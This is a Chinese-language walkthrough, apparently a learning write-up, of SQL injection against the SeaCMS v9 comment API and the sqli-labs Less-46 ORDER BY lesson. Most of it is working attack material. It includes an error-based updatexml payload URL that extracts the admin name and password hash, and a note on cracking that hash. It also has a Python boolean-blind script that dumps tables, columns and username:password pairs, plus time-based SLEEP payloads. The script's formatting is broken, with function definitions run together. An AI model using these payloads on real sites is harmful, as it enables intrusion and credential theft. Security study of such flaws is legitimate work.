seacmsv9注入管理员账号密码+orderby+limit
一、网上收集:
海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,采 用的是 php5.X+mysql 的架构,seacmsv9漏洞文件:./comment/api/index.php,漏洞参数:$rlist;
二、经过源码分析,使用以下语句注入(limit避免管理员有多个,导致SQL语句报错):
http://localhost/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml(1,concat_ws(0x20,0x5c,(select name from%23%0asea_admin limit 0,1)),1), @`'`
三、并没有成功,使用Wireshark抓包发现最终执行的SQL为:
SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment
WHERE m_type=1 AND id in (@`\'`, updatexml(1,concat_ws(0x20,0x5c,(select name from#
sea_admin limit 0,1)),1), @`\'`) ORDER BY id DESC
四、查询数据库:
五:再次在地址栏尝试注入语句,成功注入出账号为admin:
password:
http://localhost/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml(1,concat_ws(0x20,0x5c,(select password from%23%0asea_admin limit 0,1)),1), @`'`
密码同理
注入密码为23a7bbd73250516f069d,可以看出是经过md5加密的,于是到https://cmd5.com/ 解密,得到密码为admin123
布尔盲注:
import requests
from bs4 import BeautifulSoupdef get_username(resp):
soup = BeautifulSoup(resp,'html.parser')
username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
return usernamedef inject_database_boolen():
tables = ''
i = 1
while True:
left = 32
right = 127
mid = (left + right) // 2
while left < right:
url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- "
resp = requests.get(url)
if 'Dumb' == get_username(resp.text):
left = mid + 1
else:
right = mid
mid = (left + right) // 2
if mid == 32:
break
tables += chr(mid)
i += 1
print(tables)def inject_table_boolen():
tables = ''
i = 1
while True:
left = 32
right = 127
mid = (left + right) // 2
while left < right:
url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from \
information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- "
resp = requests.get(url)
if 'Dumb' == get_username(resp.text):
left = mid + 1
else:
right = mid
mid = (left + right) // 2
if mid == 32:
break
tables += chr(mid)
i += 1
print(tables)def inject_column_boolen():
tables = ''
i = 1
while True:
left = 32
right = 127
mid = (left + right) // 2
while left < right:
url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from \
information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{mid},id,username) -- "
resp = requests.get(url)
if 'Dumb' == get_username(resp.text):
left = mid + 1
else:
right = mid
mid = (left + right) // 2
if mid == 32:
break
tables += chr(mid)
i += 1
print(tables)def inject_data_boolen():
tables = ''
i = 1
while True:
left = 32
right = 127
mid = (left + right) // 2
while left < right:
url = f"http://localhost/sqli-labs-master/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,':',password) \
from users),{i},1))>{mid},id,username) -- "
resp = requests.get(url)
if 'Dumb' == get_username(resp.text):
left = mid + 1
else:
right = mid
mid = (left + right) // 2
if mid == 32:
break
tables += chr(mid)
i += 1
print(tables)if __name__ == '__main__':
# inject_database_boolen()
# inject_table_boolen()
# inject_column_boolen()
inject_data_boolen()
注入结果:
-
布尔盲注:
ORDER BY IF((SELECT SUBSTR(password,1,1) FROM sea_admin LIMIT 0,1)='a',1,2)如果页面按
1排序,则说明密码的第一个字符为a。 -
时间盲注:
ORDER BY IF((SELECT SUBSTR(password,1,1) FROM sea_admin LIMIT 0,1)='a', SLEEP(5), 1)如果页面响应时间延迟,则说明条件成立;